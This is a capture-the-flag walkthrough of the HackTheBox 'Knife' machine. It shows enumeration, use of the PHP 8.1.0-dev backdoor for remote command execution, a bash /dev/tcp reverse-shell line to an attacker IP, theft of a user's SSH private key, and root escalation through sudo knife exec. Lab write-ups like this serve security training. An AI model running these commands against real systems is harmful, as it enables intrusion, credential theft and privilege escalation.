How to get an SSH Access on Knife – HackTheBox
Enumeration
Commands :
nmap -T5 10.10.10.242
Autorecon run in background
autorecon 10.10.10.242
Web enumeration
Commands :
nmap -sC -sV 10.10.10.242 -p 80
No exploit for apache 2.4.41….
Not very interresting so I have to enumerate more.
PHP 8.1.0-dev
As I always use Autorecon in background in case of, I check the result of all his scan. The whatweb tool give to me all version who are they used in the web server.
To see the results, I use Sublime Text and this command when I am in the directory of the scan resultat : subl .
With that, all files are open automatically in sublim text, and it makes win a lot of time when you have to check the results.
whatweb command :
whatweb 10.10.10.242
When you search for php 8.1.0-dev in google you find some website who talk about backdoor remote command injection like this one : https://packetstormsecurity.com/files/162749/PHP-8.1.0-dev-Backdoor-Remote-Command-Injection.html
or this one :
https://github.com/vulhub/vulhub/tree/master/php/8.1-backdoor
The first one is a python script who do the job for you, the second you have to change the setting for the User-agent of the get request.
I decide to use the first one.
The usage command line said :
python3 php_8.1.0-dev.py -u http://ip/ -c cmd
so I try this command
python3 php_8.1.0.py -u http://10.10.10.242 -c ls
and I have the content of /
Then I try to get a reverse shell, with no success with this kind of cmdline :
python3 php_8.1.0.py -u http://10.10.10.242 -c ‘bash -i >& /dev/tcp/10.10.14.4/8080 0>&1’
Initial access - SSH
As always, you have to think how many possibilities you have to enter in a system. And remember, the first nmap scan. Two ports are open, 22 and 80. So, I check if in the home directory a .ssh folder exist.
python3 php_8.1.0.py -u http://10.10.10.242 -c ‘ls -alR /home/james/’
Command to diplay the id_rsa key :
python3 php_8.1.0.py -u http://10.10.10.242 -c ‘cat /home/james/.ssh/id_rsa’
After, copy the result and put it in a new file, in your kali box.
Change the permission :
chmod 600 id_rsa
SSH connexion
ssh james@10.10.10.242 -i id_rsa
Privilege escalation
One of the first things to do is to check the user permissions whit sudo -l
James has root priviliege to run /usr/bin/knife . I spent some time to search how to I can use this to get root acces.
Finally, I see this part when you execute this command sudo /usr/bin/knife
But it’s not enough, I have to know what language Knife software use. Go back to google and search for documentation.
On this link, https://docs.chef.io/workstation/knife_exec/, we can see that knife use ruby language.
I try different ruby script, like this one https://raw.githubusercontent.com/secjohn/ruby-shells/master/revshell.rb, it’s working, but the shell is too instable and close very fast. Even with this little script :
fork { exec(« ls ») }
Root just for few seconds…
Finally, I try this command line :
sudo /usr/bin/knife exec –exec « exec ‘/bin/sh -i' »
Get root priv!!!
#
That’s all folks
Merci d’avoir pris la peine de venir sur le site de lire ce Write Up
J’espère qu’il vous a plus et qu’il vous apprit des nouvelles choses.
N’hésitez pas à laisse un commentaire ou à partager cet article.